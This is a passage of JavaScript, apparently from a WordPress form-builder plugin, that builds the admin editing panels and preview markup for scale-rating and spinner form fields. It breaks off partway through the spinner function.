function type_scale_rating(i, w_field_label, w_field_label_pos, w_mini_labels, w_scale_amount, w_required, w_class, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_scale_rating";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");
	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	
				
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
		
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_scale_amount_label = document.createElement('label');
				el_scale_amount_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_scale_amount_label.innerHTML = "Scale Amount ";
	
	var el_scale_amount_input = document.createElement('input');
                el_scale_amount_input.setAttribute("type", "text");		
                el_scale_amount_input.setAttribute("id", "edit_for_scale_amount");		
                el_scale_amount_input.setAttribute("value", w_scale_amount);
                el_scale_amount_input.style.cssText = "width:100px;";	
				el_scale_amount_input.setAttribute("onKeyPress", "return check_isnum(event)");	
			   el_scale_amount_input.setAttribute("onKeyUp", "change_scale_amount(this.value,"+i+",'form_id_temp')");
           
	
	
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_scale_rating')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_scale_rating')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_scale_rating')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_scale_rating')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	
	edit_main_td3.appendChild(el_scale_amount_label);
	edit_main_td3_1.appendChild(el_scale_amount_input);

	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br1);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	

	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
 
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//	add_id_and_name(i, 'type_scale_rating');
//show table

	
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_scale_rating");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
			
			
	var adding_scale_amount = document.createElement("input");
           	 	adding_scale_amount.setAttribute("type", "hidden");
           	 	adding_scale_amount.setAttribute("value", w_scale_amount);
			adding_scale_amount.setAttribute("id", i+"_scale_amountform_id_temp");
			adding_scale_amount.setAttribute("name", i+"_scale_amountform_id_temp");
			

			
			
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
		
		var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red;");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);  
		
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'middle');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

		var div1 = document.createElement('div');	
           	div1.setAttribute("id", i+"_elementform_id_temp");
		
			div1.style.cssText ="float:left;";
		
		var scale_table = document.createElement('table');
           	scale_table.setAttribute("id", i+"_scale_tableform_id_temp");
			scale_table.style.cssText ="display:inline-table;";
			
			
		var scale_tr0 = document.createElement('tr');
           	scale_tr0.setAttribute("id", i+"_scale_tr1form_id_temp");
		
		var scale_tr1 = document.createElement('tr');
           	scale_tr1.setAttribute("id", i+"_scale_tr2form_id_temp");
			
	   		
		var br1 = document.createElement('br');

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			
		
		
		var label1 = document.createElement('label');
			label1.setAttribute("class", "mini_label");	
			label1.setAttribute("id", i+"_mini_label_worst");
			label1.innerHTML= w_mini_labels[0];
			label1.style.cssText ="position:relative; top:6px; font-size:11px;";
			
		var label2 = document.createElement('label');
			label2.setAttribute("class", "mini_label");	
			label2.setAttribute("id", i+"_mini_label_best");
			label2.innerHTML= w_mini_labels[1];
			label2.style.cssText ="position:relative; top:6px; font-size:11px;";
	    
		
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td1.appendChild(required );
      	td2.appendChild(adding_type);
      	td2.appendChild(adding_required);
		td2.appendChild(adding_scale_amount);
      	

		
		
		div1.appendChild(label1);
		scale_table.appendChild(scale_tr0);
		 
	for(var l=1;l<=w_scale_amount;l++){	   
	adding_num=document.createElement("span");
	adding_num.innerHTML = l;
	           
    adding_td =	document.createElement('td');
	adding_td.setAttribute("id", i+"_scale_td1_"+l+"form_id_temp");
	adding_td.style.cssText = 'text-align:center;';
	
	adding_td.appendChild(adding_num);
	scale_tr0.appendChild(adding_td);
	
    }	
	 
    for(var k=1;k<=w_scale_amount;k++){	

	
	var adding_radio=document.createElement("input");
	    adding_radio.setAttribute('id', i+'_scale_radioform_id_temp_'+k);
		adding_radio.setAttribute('name', i+'_scale_radioform_id_temp');
		adding_radio.setAttribute('value', k);
        adding_radio.setAttribute('type', 'radio');
		
	
    var adding_td_for_radio=document.createElement("td");
	     adding_td_for_radio.setAttribute('id', i+'_scale_td2_'+k+'form_id_temp');
       
	    adding_td_for_radio.appendChild(adding_radio);
		scale_tr1.appendChild(adding_td_for_radio);
	    scale_table.appendChild(scale_tr1);
      	div1.appendChild(scale_table);
		
	}	
	  
	    scale_table.appendChild(scale_tr1);
      	div1.appendChild(scale_table);
	    div1.appendChild(label2);
	td2.appendChild(div1);
	
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br1);
		div.appendChild(div_for_editable_labels);
		
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
				
	jQuery(document).ready(function() {	
	jQuery("label#"+i+"_mini_label_worst").click(function() {		
	if (jQuery(this).children('input').length == 0) {		

		var worst = "<input type='text' class='worst' size='6' style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";		

		jQuery(this).html(worst);		
		jQuery("input.worst").focus();		
		jQuery("input.worst").blur(function() {	

		var value = jQuery(this).val();			
		jQuery("#"+i+"_mini_label_worst").text(value);		
		});		
	}	
	});	

	
	jQuery("label#"+i+"_mini_label_best").click(function() {		

	if (jQuery(this).children('input').length == 0) {			
		var best = "<input type='text' class='best' size='6'  style='outline:none; border:none; background:none; font-size:11px;' value=\""+jQuery(this).text()+"\">";						

		jQuery(this).html(best);					

		jQuery("input.best").focus();			
		jQuery("input.best").blur(function() {		
		
		var value = jQuery(this).val();			
		jQuery("#"+i+"_mini_label_best").text(value);		
		});	
	}	
	});
	
	});			
				
				
change_class(w_class, i);
refresh_attr(i, 'type_scale_rating');


}

function change_scale_amount(b,c,form_id){
	var table=document.getElementById(c+"_scale_tableform_id_temp");
	var div=document.getElementById(c+"_elementform_id_temp");

	div.removeChild(table);

	var scale_table = document.createElement('table');
           	scale_table.setAttribute("id", c+"_scale_tableform_id_temp");
			scale_table.style.cssText ="display:inline-table;";
			
			
	   var tr0 = document.createElement('tr');
           	tr0.setAttribute("id", c+"_scale_tr1form_id_temp");
		
	   var tr1 = document.createElement('tr');
           	tr1.setAttribute("id", c+"_scale_tr2form_id_temp");
			scale_table.appendChild(tr0);
	for(var l=1;l<=b;l++){	 

		adding_num=document.createElement("span");
		adding_num.innerHTML = l;
				   
		adding_td =	document.createElement('td');
		adding_td.setAttribute("id", c+"_scale_td1_"+l+"form_id_temp");
		adding_td.style.cssText = 'text-align:center;';
		
		adding_td.appendChild(adding_num);
		tr0.appendChild(adding_td); 
		
		}	
	 
	for(var k=1;k<=b;k++){	

		
		var adding_radio=document.createElement("input");
			adding_radio.setAttribute('id', c+'_scale_radioform_id_temp_'+k);
			adding_radio.setAttribute('name', c+'_scale_radioform_id_temp');
			adding_radio.setAttribute('value', k);
			adding_radio.setAttribute('type', 'radio');
			

		var adding_td_for_radio=document.createElement("td");
			adding_td_for_radio.setAttribute('id', c+'_scale_td2_'+k+'form_id_temp');
			adding_td_for_radio.appendChild(adding_radio);
		   tr1.appendChild(adding_td_for_radio);
			
	}	
	scale_table.appendChild(tr1);
	div.insertBefore(scale_table,div.childNodes[1])
		  
	document.getElementById(c+'_scale_amountform_id_temp').value = b;
}


function type_spinner(i, w_field_label, w_field_label_pos, w_field_width, w_field_min_value, w_field_max_value, w_field_step, w_field_value, w_required, w_class, w_attr_name, w_attr_value){

   document.getElementById("element_type").value="type_spinner";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");
	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");		

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	
				
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";	  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	                el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

				
	var el_spinner_width_label = document.createElement('label');
				el_spinner_width_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_spinner_width_label.innerHTML = "Width ";
	
	var el_spinner_width_input = document.createElement('input');
                el_spinner_width_input.setAttribute("type", "text");		
                el_spinner_width_input.setAttribute("id", "edit_for_spinner_width");		
                el_spinner_width_input.setAttribute("value", w_field_width);
                el_spinner_width_input.style.cssText = "width:100px;";	
				el_spinner_width_input.setAttribute("onKeyPress", "return check_isnum(event)");	
			   el_spinner_width_input.setAttribute("onKeyUp", "change_spinner_width(this.value,"+i+",'form_id_temp')");			
				
				
				
	var el_spinner_min_value_label = document.createElement('label');
				el_spinner_min_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_spinner_min_value_label.innerHTML = "Min Value ";
	
	var el_spinner_min_value_input = document.createElement('input');
                el_spinner_min_value_input.setAttribute("type", "text");		
                el_spinner_min_value_input.setAttribute("id", "edit_for_spinner_min_value");		
                el_spinner_min_value_input.setAttribute("value", w_field_min_value);
                el_spinner_min_value_input.style.cssText = "width:100px;";	
				el_spinner_min_value_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
				el_spinner_min_value_input.setAttribute("onChange", "change_spinner_min_value(this.value,"+i+",'form_id_temp')");
			   
			   
      var el_spinner_max_value_label = document.createElement('label');
				el_spinner_max_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_spinner_max_value_label.innerHTML = "Max Value ";
	
	var el_spinner_max_value_input = document.createElement('input');
                el_spinner_max_value_input.setAttribute("type", "text");		
                el_spinner_max_value_input.setAttribute("id", "edit_for_spinner_max_value");		
                el_spinner_max_value_input.setAttribute("value", w_field_max_value);
                el_spinner_max_value_input.style.cssText = "width:100px;";	
				el_spinner_max_value_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
				el_spinner_max_value_input.setAttribute("onChange", "change_spinner_max_value(this.value,"+i+",'form_id_temp')");     
	
	var el_spinner_step_label = document.createElement('label');
	        el_spinner_step_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_spinner_step_label.innerHTML = "Step";
		
		var el_spinner_step_input = document.createElement('input');
                el_spinner_step_input.setAttribute("type", "text");		
                el_spinner_step_input.setAttribute("id", "edit_for_spinner_step");		
                el_spinner_step_input.setAttribute("value", w_field_step);
                el_spinner_step_input.style.cssText = "width:100px;";	
				el_spinner_step_input.setAttribute("onKeyPress", "return check_isnum_or_minus(event)");
				el_spinner_step_input.setAttribute("onChange", "change_spinner_step(this.value,"+i+",'form_id_temp')");
	


	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_spinner')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_spinner')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_spinner')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_spinner')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
